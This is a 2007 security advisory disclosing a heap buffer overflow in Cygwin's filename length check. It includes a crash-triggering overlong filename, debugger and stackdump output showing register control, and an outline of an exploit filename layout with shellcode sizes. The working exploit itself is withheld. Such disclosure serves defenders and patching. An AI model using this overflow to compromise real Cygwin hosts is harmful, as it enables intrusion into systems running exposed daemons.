cygwin-overflow.txt

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2007-005  
- Original release date: May 23rd, 2007  
- Last revised: November 24th, 2007  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 5/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Cygwin buffer overflow in the filename length check  
  
II. BACKGROUND  
-------------------------  
Cygwin is a Linux-like environment for Windows wich consists in a dll  
binary (cygwin1.dll) wichs emulates linux api, and a set of tools  
which provide Linux look and feel.  
  
Sometimes, the administrators relay in cygwin security in order to  
open a daemon to the net (sshd, telnetd, ftpd ...) over cygwin.  
  
III. DESCRIPTION  
-------------------------  
Traditionally, linux filesystem allow 255 bytes long, nevertheless  
cygwin allow 239 bytes and there is a check that prevents filenames  
equal or major than 240.  
  
In spite of the check, there is a 232 bytes long dynamic memory buffer  
where is stored the filename, so that is possible make a evil filename  
with 233-239 bytes long that bypasses the check and overflows the heap  
maximum 7 bytes.  
  
So you had to penetrate in machine and put the evil-file and then 7  
bytes of the private heap and ebx and edi registers are for the exploit.  
  
The following file has to be uploaded, if we use touch to create it,  
cygwin will be bofed.  
  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYY  
  
...  
  
$ cat scp.exe.stackdump  
Exception: STATUS_ACCESS_VIOLATION at eip=6109008D  
eax=6167343A ebx=5959595A ecx=6167343C edx=04A96F89 esi=6E6C0055  
edi=59595957  
ebp=6E6C006C esp=0022E51B program=C:\sshd\bin\scp.exe  
cs=001B ds=0023 es=0023 fs=0038 gs=0000 ss=0023  
  
$ gdb /usr/bin/touch.exe  
GNU gdb 2003-09-20-cvs (cygwin-special)  
...  
(gdb) r AAAA ...  
Program received signal SIGSEGV, Segmentation fault.  
0x61091eea in getppid () from /usr/bin/cygwin1.dll  
(gdb) x/i 0x61091eea  
0x61091eea <getppid+2954>: mov 0xc(%ebp),%eax  
(gdb) i r ebp eax  
ebp 0x22006b 0x22006b  
eax 0xffffffff -1  
  
filename: [nops][shellcode][jmp][buff]  
nops + shellcode = 210 bytes  
jmp = 4 bytes  
buff = 24 bytes  
  
IV. PROOF OF CONCEPT  
-------------------------  
Not public.  
  
V. BUSINESS IMPACT  
-------------------------  
Systems could be compromissed exploiting this vulnerability.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
All cygwin1.dll up to 1.5.7.  
Is possible that versions from 1.5.7 to 1.5.19 are vulnerable too due  
bad use of name length constants in cygwin code.  
  
VII. SOLUTION  
-------------------------  
The patch is available at http://www.cygwin.com/snapshots  
Latest version (1.5.24) don't have this problem.  
  
VIII. REFERENCES  
-------------------------  
http://www.cygwin.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Jesus Olmos Gonzalez (jolmos (at) isecauditors=dot=com)  
  
X. REVISION HISTORY  
-------------------------  
May 23, 2006: Initial release  
August 06, 2007: First Revision  
November 23, 2007: Last Revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
May 23, 2006: Vulnerability acquired by  
Jesus Olmos Gonzalez (Internet Security Auditors)  
November 08, 2007: First vendor notification and discussion in devel  
list about its impact. Considered collaterally  
corrected.  
November 24, 2007: Published.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  
`